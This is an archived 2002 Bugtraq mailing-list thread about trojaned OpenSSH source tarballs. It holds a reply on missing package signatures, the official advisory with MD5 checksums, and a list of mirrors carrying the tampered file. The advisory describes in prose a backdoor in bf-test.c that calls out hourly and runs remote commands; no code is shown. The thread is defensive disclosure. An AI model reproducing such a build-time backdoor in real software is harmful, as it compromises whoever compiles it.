(8799826) /Christian Bahls <christian.bahls@stud.uni-rostock.de>/(Ombruten)
Kommentar i text 8799863

Kommentar i text 8802039 av Jim Breton <jamesb-bugtraq@alongtheway.com>
8802039 2002-08-01 18:45 +0000  /29 rader/ Jim Breton <jamesb-bugtraq@alongtheway.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-08-02  00:33  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <23459>
Kommentar till text 8799826 av Christian Bahls <christian.bahls@stud.uni-rostock.de>
Ärende: Re: trojan horse in recent openssh (version 3.4 portable 1)
------------------------------------------------------------
From: Jim Breton <jamesb-bugtraq@alongtheway.com>
To: bugtraq@securityfocus.com
Message-ID: <20020801184534460715.G1299@alongtheway.com>

On Thu, Aug 01, 2002 at 02:17:36PM +0200, Christian Bahls wrote:
> 1.) i do not often check signatures an packets i install

Particularly difficult when there _are no_ signatures available for
the package you want to install (in this case, the non-"portable"
tarballs).

AFAIK there have never been signatures available for the OpenBSD
tarballs.  At least none that I've seen on the FTP server.  I hope
this will change soon...?

I have also been curious as to how exactly DJM and the portability
group have been verifying that _they_ obtained clean tarballs before
applying their modifications.  If they also have no way to verify
tarballs, that effectively blinds a very important set of eyes from
being able to spot trojans.

(Of course, if they are just doing CVS checkouts from a secure CVS
server, this issue would be moot.  But the fact that the portable
versions were also trojaned, combined with the appearance that the
trojaning occurred _on the FTP server and not on any development
machines_, I think allows one to reasonably assume that the tarballs
are being used.  This last point may not be the case, we will have to
wait for more information to come out.)
(8802039) /Jim Breton <jamesb-bugtraq@alongtheway.com>/(Ombruten)

8800840 2002-08-01 11:18 -0400  /54 rader/ Niels Provos <provos@citi.umich.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2002-08-01  18:35  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <23433>
Ärende: OpenSSH Security Advisory:  Trojaned Distribution Files
------------------------------------------------------------
From: Niels Provos <provos@citi.umich.edu>
To: bugtraq@securityfocus.com
Message-ID: <20020801151812.GE6925@citi.citi.umich.edu>

OpenSSH Security Advisory (adv.trojan)

1. Systems affected:

OpenSSH version 3.2.2p1, 3.4p1 and 3.4 have been trojaned on the
OpenBSD ftp server and potentially propagated via the normal mirroring
process to other ftp servers.  The code was inserted some time between
the 30th and 31th of July.  We replaced the trojaned files with their
originals at 7AM MDT, August 1st.

2. Impact:

Anyone who has installed OpenSSH from the OpenBSD ftp server or any
mirror within that time frame should consider his system compromised.
The trojan allows the attacker to gain control of the system as the
user compiling the binary.  Arbitrary commands can be executed.

3. Solution:

Verify that you did not build a trojaned version of the sources.  The
portable SSH tar balls contain PGP signatures that should be verified
before installation.  You can also use the following MD5 checksums for
verification.

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 
MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c
MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01
MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a

4. Details

When building the OpenSSH binaries, the trojan resides in bf-test.c
and causes code to execute which connects to a specified IP address.
The destination port is normally used by the IRC protocol.  A
connection attempt is made once an hour.  If the connection is
successful, arbitrary commands may be executed.

Three commands are understood by the backdoor:

Command A:  Kill the exploit.
Command D:  Execute a command.
Command M:  Go to sleep.

5. Notice:

Because of the urgency of this issue, the advisory may not be
complete.  Updates will be posted to the OpenSSH web pages if
necessary.
(8800840) /Niels Provos <provos@citi.umich.edu>/----
Bilaga (application/pgp-signature) i text 8800841
8800841 2002-08-01 11:18 -0400  /13 rader/ Niels Provos <provos@citi.umich.edu>
Importerad: 2002-08-01  18:35  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <23434>
Bilaga (text/plain) till text 8800840
Ärende: Bilaga till: OpenSSH Security Advisory:  Trojaned Distribution Files
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (OpenBSD)
Comment: For info see http://www.gnupg.org

iQEVAwUBPUlRNDZ8FqYKL4flAQHVQQgAi88o43SftqLHXvkn/J0yKYjKsNf42yoB
KXfLrFDD7DeYFNnXUol5XLVvjEpEkmSPIh/fXNXptkM8J7MXFcOMpzu0rb+3PMAo
K73r0MePJ++4SzYD4Qn0yz7TOGpaMHVfK1lUx6sHUx50yRYp6Mmt4f5vZenhGvOF
REhcsvaNBBGHyHo7dnqIy+viupR4QkaeZ0aeIgbSoQhilYclzw5MwK2PwK/9MV1r
RuL1UAhA2oG0nlM0f9fYcI5iWDuMDq5XC+oqWXOJ0ivMyyoQeL7Mh4IIm1wNV55Q
f2eThXAVPkC+d1KifUJOa01DUwxwHYIwdnaEaEUUCde37JGsnAvWIg==
=s0fY
-----END PGP SIGNATURE-----
(8800841) /Niels Provos <provos@citi.umich.edu>/----
8801656 2002-08-01 19:56 +0300  /96 rader/ Tomi Nylund <wizard@university.in.oulu.fi.invalid>
Sänt av: joel@lysator.liu.se
Importerad: 2002-08-01  22:19  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <23446>
Ärende: List of mirrors carrying trojaned OpenSSH
------------------------------------------------------------
From: Tomi Nylund <wizard@university.in.oulu.fi.invalid>
To: bugtraq@securityfocus.com
Message-ID: <3D496836.5C8D56D1@university.in.oulu.fi.invalid>

Hello,

my first post to the list. Cool.. :)

Sorry for the horrible formatting: this was posted in haste using
Netscape's
Mail client :(

Anyways, we did some research here at Oulu regarding the propagation
of the trojaned OpenSSH-3.4p1.tar.gz, and found out the following:

Trojaned mirrors:

3ac9bc346d736b4a51d676faa2a08a57 MD5
(./ftp.club-internet.fr/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.easynet.be/openssh/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.freenet.de/pub/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.fsn.hu/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.inet.no/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.isu.net.sa/pub/mirrors/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57 MD5
(./ftp.jaquet.dk/pub/openSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.openbsd.cz/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.openbsd.org.br/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.openbsd.ru/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.sajinet.com.pe/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.stealth.net/pub/mirrors/ftp.openssh.com/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.tku.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.uninett.no/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp.volftp.mondadori.com/mirror/openbsd/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./ftp7.usa.openbsd.org/pub/os/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./hal.csd.auth.gr/mirrors/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./openbsd.csie.nctu.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./openbsd.nsysu.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=
3ac9bc346d736b4a51d676faa2a08a57
MD5(./openbsd.rug.ac.be/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz)=

The list was taken from http://www.openssh.com/portable.html, it does
NOT contain all the mirrors out there, just the primary ones, I
guess..  The list was taken around 1700 hours EEST.

Also, it should be apparent that NOTHING from ftp.openbsd.org should
be trusted until their sysadmins have done full damage assesment.

Also, some people have debated on the severity of opening a shell to
some remote location. Please note, that any commands may be ran over
such connection, perhaps patching the OpenSSH source code a bit
further, or dropping a platform-specific rootkit to the victim's
system: the author had gone to great lengths to make the code as
portable as possible.

My e-mail address is obfuscated to repel spammers, however, if you
wish to contact me or any other members of our group, you'll find our
contact detail from our web pages.


Regards,

Tomi

--------------Tomi Nylund, Research Scientist, OUSPG----------------
Group info & contact details at http://www.ee.oulu.fi/research/ouspg
PGP key: http://www.ee.oulu.fi/research/ouspg/ouspg-key.asc
Key fingerprint =  B2 F7 97 09 F5 4C 29 97  9A A8 2D FB 59 CA 10 C4
-------------Oulu University Secure Programming Group---------------
(8801656) /Tomi Nylund <wizard@university.in.oulu.fi.invalid>/(Ombruten)